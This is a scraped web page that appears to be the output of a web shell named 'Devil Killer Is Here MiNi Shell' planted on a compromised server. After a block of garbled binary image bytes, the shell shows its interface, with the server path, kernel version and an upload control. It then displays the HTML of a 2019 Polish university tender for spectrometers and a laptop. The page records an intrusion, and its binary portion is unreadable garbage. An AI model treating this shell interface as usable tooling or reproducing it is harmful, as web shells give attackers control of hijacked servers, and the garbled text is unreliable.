JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20190919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20190919/599527-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 599527-N-2019 z dnia 2019-09-19 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">DOSTAWA DWÓCH SPEKTROMETRÓW ORAZ KOMPUTERA PRZENOŚNEGO DLA WYDZIAŁU CERAMIKI I SZKŁA AKADEMII SZTUK PIĘKNYCH IM. EUGENIUSZA GEPPERTA WE WROCŁAWIU</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">27581400000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">pl. Polski</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">3/4</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">50-156</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wrocław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">713 438 031</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">przetargi@asp.wroc.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">713 431 558</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.asp.wroc.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Uczelnia publiczna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">bip.asp.wroc.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">bip.asp.wroc.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012r. - Prawo pocztowe (Dz. U. z 2018 r. poz. 2188 ze zmianami), osobiście lub za pośrednictwem posłańca </span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, Pl. Polski 3/4, 50-156 Wrocław do sekretariatu Kanclerza (pok. 105P, I piętro) w dni powszednie w godzinach: 8:00-15:00.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">DOSTAWA DWÓCH SPEKTROMETRÓW ORAZ KOMPUTERA PRZENOŚNEGO DLA WYDZIAŁU CERAMIKI I SZKŁA AKADEMII SZTUK PIĘKNYCH IM. EUGENIUSZA GEPPERTA WE WROCŁAWIU</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">ZP-8/09/2019</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">ZAKRES PRZEDMIOTU ZAMÓWIENIA:CZĘŚĆ NR 1 SPEKTORMETR - RĘCZNY ANALIZATOR FLUORESCENCJI RENTGENOWSKIEJ - 1szt. zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA)SPEKTROMETR RĘCZNY ANALIZATOR FLUORESCENCJI RENTGENOWSKIEJ WRAZ Z DODATKOWYMI AKCESORIAMILp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO	/SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Elementy (	1.	Zestaw akcesoriów - przystawka do pomiaru w atmosferze helu 2.	Wyświetlacz dotykowy LCD 3.	Wbudowana kamera);2) Detektor (	1.	Materiał grafen 1um2.	Rozdzielczość poniżej 140eV, 250,000 cps Mn K?);3) Zakres analityczny pomiaru (	1.	Zakres analityczny pierwiastków od Sodu (Na) do Uranu (U) - pomiar w atmosferze powietrza2.	Zakres analityczny pierwiastków od fluoru (F) do uranu (U) - pomiar w atmosferze helu);4) Źródło promieniowania (	Rodowe (Rh));5) Zakres regulacji źródła promieniowania (	1.	Napięcie 6kV-50 kV2.	Prąd 5-200 uA3.	250,000 cps Mn K?4.	< 4 W);6) Przebieg wiązki rentgenowskiej (	1.	Pomiar w atmosferze powietrza2.	Pomiar w atmosferze helu);7) Zasilanie spektrometru	Maksymalne zasilanie 50 kV8) Kolimator (	Rozmiar: 3mm i 8mm);9) Filtry(	Biały, czarny, czerwony);10) Łączność (	Wi-fi, Bluetooth, Port USB, Gniazdo karty pamięci, Kabel USB);11) Akumulator - 2szt (	Litowo-jonowyCzas pracy min.4 godziny);12) Opakowanie do bezpiecznego przechowania, transportu (	1.	Odporne na wstrząsy2.	Wodoodporne3.	Wyposażone w kółka);13) Oprogramowanie podstawowe (	1.	Oparte na platformie Windows2.	W języku polskim i angielskim14) Oprogramowanie dodatkowe	1.	Do wykonywania obróbki widm2.	Analiza wyników3.	Kalibracji);15) Kalibracja (	1.	Na pierwiastkach glinokrzemianowych w atmosferze powierza 2.	Na pierwiastkach glinokrzemianowych w atmosferze helu3.	Dla głównych i śladowych pierwiastków w różnych szkłach w szczególności szkło sodowo-krzemionkowe, szkło sodowo-wapniowe, szkło ołowiowe);16) Statywy (stojak) -3szt. (	1.	Nabiurkowy umożliwiający korzystanie ze spektrometru w warunkach laboratoryjnych2.	Przenośny, trójnożny z regulowanymi uchwytami\3.	Stojak umożliwiający pozycjonowanie próbki przy pomiarach z zastosowaniem helu);17) Szkolenie (	Szkolenie w zakresie obsługi urządzenia oraz oprogramowania - minimum 2 dni (16 godzin) dla 4 osób w terminie uzgodnionym z Zamawiającym (całkowity koszt szkoleń ponosi Wykonawca));18) Gwarancja zgodnie z warunkami określonymi we wzorze umowy (	2 lata na spektrometr);19) Dostawa i montaż (	Budynku ASP we Wrocławiu Centrum Sztuk Użytkowych - Centrum Innowacyjności, ul Traugutta 19/21, pokój 216);20) Termin dostawy (	Dostarczenie zgodnie z ofertą - do dnia 10-12-2019r.Dostarczenie zgodnie z ofertą - do dnia 02-12-2019r.).CZĘŚĆ NR 2 PRZENOŚNY SPEKTROMETR PODCZERWIENI (FTIR) - 1szt.zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA)SPEKTROMETR PODCZERWIENI (FTIR) WRAZ Z DODATKOWYMI MODUŁAMILp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO	/SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Zakres spektralny (	min. 4500 - 650 cm-1 (w konfiguracji z komorą pomiarową, optyka KBr));2) Detektor (	DLATGS, pracujący w temperaturze otoczenia);3) Rozdzielczość (	Zdolność rozdzielcza równa lub mniejsza niż 4 cm-1);4) Czułość (	Powyżej 55 000:1 dla testu 1 min., rozdzielczość 4 cm-1, z detektorem standardowym);5) Dokładność liczby falowej (	Mniej niż 0.05 cm-1 przy ,1554 cm-1);6) Precyzja liczby falowej (	powtarzalność <0.0005 cm-1 przy 1,554 cm-1 (odchylenie standardowe dla 10 pomiarów));7) Moduł ATR ( Moduł ATR, jednodobiciowa, diamentowa (kryształ monolityczny, nie klejony z innym kryształem), kryształ wprasowywany, nie wklejany; automatycznie rozpoznawana przez spektrometr. Po zamontowaniu odbywa się automatyczny test sprawdzający min. Stosunek sygnału do szumu; automatyczne zaczytanie podstawowych parametrów pomiarowych. Przystawka pracująca w zakresie spektralnym min. min. 4500-650 cm-1 );8) Moduł refleksyjny (	Moduł refleksyjny, z punktem pomiarowym poza modułem; umożliwiający pomiary bezkontaktowe, wyposażony w kamerę video zapewniającą wizualizację w oprogramowaniu do sterowania spektrometrem obszaru pomiarowego oraz zapisywanie tego obrazu wraz z widmem);9) Moduł do pomiarów rozproszeniowych (	Moduł do pomiarów rozproszeniowych, pracujący w zakresie 300-3200 cm-1, wyposażony we własne automatycznie przestrajalne źródło 750/1100 nm o mocy poniżej 100 mW oraz własny układ detektorowy. Moduł wykonany w obudowie min IP54, waga nie większa niż 1.5 kg. Walizka transportowa dedykowana dla tego modułu);10) Interferometr (	30° interferometr wykorzystujący pozłacane lustra kubiczne, ustawiany na stałe, nie wymagający justowania dynamicznego lub justowania automatycznego.Interferometr bezłożyskowy, bezsmarowy.Komora interferometru, szczelna, osuszana przez wymienne osuszki i trwale odizolowana od układu pomiarowego przez demontowalne okienka KBr.Spektrometr wyposażony w laser diodowy zamiast lasera HeNe);11) Przetwornik ADC (	24 bit dynamiczny zakres);12) Walidacja (	Wewnętrzne koło walidacyjne z odpowiednimi filtrami zapewniające całkowicie automatyczne wykonywanie testów OQ/PQ sprawdzających min: stosunek sygnału do szumu, amplitudę sygnału, powtarzalność pomiarowa, kalibracje spektrometru. Po zakończeniu testu raport powinien być automatycznie zapisywany w pliku PDF);13) Wymagania (	1.	Urządzenie musi zapewniać łatwą mobilność, przenoszenie do rożnych pomieszczeń oraz przewożenie przez personel laboratorium.2.	Masa urządzenia nie więcej niż 7.5 kg (w konfiguracji podstawowej); w zestawie walizka transportowa umożliwiająca pomieszczenie spektrometru i dostarczonych modułów pomiarowych.3.	Wymiary nie większe niż 22 cm x 33 cm x 15 cm, (w konfiguracji z komorą pomiarową) wysoka trwałość mechaniczna (obudowa wykonana z odlewu aluminiowego), odporność na wstrząsy mechaniczne i zmiany temperatury;4.	Osuszki regenerowalne (zapasowe wkłady w zestawie), wymiana osuszek bez odwracania spektrometru oraz rozszczelniania optyki.5.	Możliwość zasilania akumulatorowego zintegrowanego ze spektrometrem;6.	Możliwość podłączenia zewnętrznego panela dotykowego z pełnofunkcjnalnym oprogramowaniem (panel klasy przemysłowej).7.	Automatyczne rozpoznawanie przystawek pomiarowych (ATR, transmisyjna etc.) i automatyczna konfiguracja przyrządu w zależności od zamontowanej przystawki, wymiana przystawek bez używania dodatkowych narzędzi;8.	System automatycznej kontroli (monitoring) elementów składowych urządzenia, wilgotności i wydajności wraz z systemem informującym na panelu spektrometru.Sterownie komputerowe nie wymagające dodatkowych dedykowanych kart - łączność z PC przez standardowy port Ethernet lub USB);14) Źródło promieniowania (	SiC globar, możliwość samodzielnej wymiany przez przeszkolonego użytkownika bez konieczności wizyty serwisu, rozszczelniania optyki czy też obracania spektrometru);15) Wymagane oprogramowanie (	1.	Urządzenie sterowane prze komputer pracujący w systemie Windows.2.	Program obsługi spektrometru, zapewniający min.:3.	Interaktywny asystent pomocy ,,krok po kroku"4.	Pomoc on-line5.	Interaktywny podręcznik spektroskopii FT-IR6.	Menu pomiarowe7.	Procedury wstępnej obróbki danych8.	Opisywanie pasm9.	Porównywanie widm10.	Narzędzia interpretacji widm11.	Przeszukiwanie bibliotek12.	Bibliotekę startowa z ponad 550 widmami13.	Bibliotekę ATR pigentów, żywic, barwników min 500 widm14.	Analizę ilościową (zgodnie z prawem Lambert'a - Beer'a)15.	Analizę ilościowa bazującą na modelach chemometrycznych.16.	Analizę całkującą17.	Funkcje automatyzujące pomiary18.	Tworzenie i uruchamianie własnych makr19.	Dziennik laboratoryjny20.	Predefiniowane raporty wydruków wraz z możliwością ich edycji21.	Łatwy eksport widm do innych formatów22.	Automatyczne procedury testowania spektrometru, 2 poziomy (OQ, PQ)23.	Ciągła kontrola statusu spektrometru24.	Wielopoziomowe zarządzie użytkownikami);16) Dodatkowe wymagania (	Przyrząd fabrycznie nowyUrządzenie posiada certyfikat CE);17) Szkolenie (	Szkolenie w zakresie obsługi urządzenia oraz oprogramowania - minimum 4 dni (32 godziny) dla 4 osób w terminie uzgodnionym z Zamawiającym (całkowity koszt szkoleń ponosi Wykonawca));18) Gwarancjezgodnie z warunkami określonymi we wzorze umowy (	3 lata gwarancji na spektrometr podczerwieni w tym także na moduł ATR i moduł refleksyjny10 lat gwarancji na interferometr10 lat gwarancji na laser półprzewodnikowy10 lat gwarancji na płytkę z kryształem ATR diamentowym5 lat gwarancji na źródło IR2 lata pełnej gwarancji na moduł do pomiarów rozproszeniowych);19) Warunki dostawy ( Dostarczenie zgodnie z ofertą - do dnia 10-12-2019 Dostarczenie zgodnie z ofertą - do dnia 02-12-2019);20) Dostawa i montaż (	Budynku ASP we Wrocławiu Centrum Sztuk Użytkowych - Centrum Innowacyjności, ul Traugutta 19/21, pokój 216).CZĘŚĆ NR 3 KOMPUTER PRZENOŚNY- 1szt.zgodny ze wskazanym poniżej szczegółowym opisem wymaganych parametrów technicznych (specyfikacją techniczną):SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA (SPECYFIKACJA TECHNICZNA) KOMPUTER PRZENOŚNYLp.	/NAZWA PARAMETRÓWWYMAGANYCH PRZEZ ZAMAWIAJĄCEGO/	SZCZEGÓLOWY OPIS PARAMETRÓW WYMAGANYCH PRZEZ ZAMAWIAJĄCEGO (SPECYFIKACJA TECHNICZNA)1) Zastosowanie (	Sterowanie urządzeniami specjalistycznymi);2) Procesor (	64 bit, osiągający wynik nie gorszy niż 7655 pkt. w teście PassMark - CPU Mark; wyniki dostępne na stronie: http://www.cpubenchmark.net na dzień 16.09.2019 r. (w załączeniu SIWZ wydruk ze strony z tej daty));3) Pamięć RAM (	8 GB);4) Interfejsy (	LAN 10/100/1000 Mbps, Wi-Fi, Bluetooth, 3 x USB (w tym min 2 x USB 3.0), 1 x HDMI, 1 x RJ-45);5) Pamięć masowa (	SSD 256 GB);6) Matryca (	15.6", 1920 x 1080 (Full HD));7) Zainstalowany system operacyjny (	Windows 10 Pro PL);8) Waga (	Max. 2,0 kg);9) Ergonomia (	Wydzielona 